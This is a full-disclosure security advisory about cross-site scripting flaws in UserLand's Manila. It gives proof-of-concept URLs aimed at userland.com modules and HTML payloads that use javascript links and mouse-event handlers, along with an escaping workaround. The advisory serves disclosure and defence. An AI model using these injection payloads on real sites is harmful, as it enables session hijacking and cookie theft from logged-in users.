Multiple XSS bugs in manila.
To: manila-bugs@xxxxxxxxxxxx
Authors:
Michael Bauer <mihi@xxxxxxxxxx>, Aaron Kaplan <aaron@xxxxxxxxxx>
This bugs will be reported to you and released to the public 10
days after
submission to userland.com, as we strongly believe in full disclosure.
Software:
manila
Vendor:
userland.com
Versions tested :
<meta name="generator" content="UserLand Frontier 9.0.1">
Overview:
Manila is vulnerable to several XSS injections which can be abused
to steal a cookie from a logged in user. This means taking over his
session
doing stuff in his name.
Details:
In the module "msgReader"
--------------------------
proof of concept:
http://manila.userland.com/discuss/msgReader$1?mode=%22%3E%
3Cscript%3Eale
rt('XSS!')%3C/script%3E
in the module "sendMail":
--------------------------
proof of concept:
http://profiles.userland.com/sendMail?usernum=2500&referer=%
22%3E%3Cscrip
t%3Ealert('xss')%3C/script%3E
in the module "editInBrowser"
-----------------------------
explanation:
it is possible to use <a> and other html tags to put
javascript
instructions into the webpage examples:
<a href=javascript:alert('xss!')>click here</a>
<a href=# onmouseover="alert('xss!')">click here</a>
<a href=# onmouseout="alert('xss!')">click here</a>
demo can be seen on http://mana.manila.at/discuss/msgReader
$15?mode=day
as we got an account there.
Workaround:
htmlescape all user input! if you want to accept html as input
write your own html parser for a limited html subset.
Disclaimer:
For educational purposes only, we are not responsible to any harm
produced
by the security hole we published.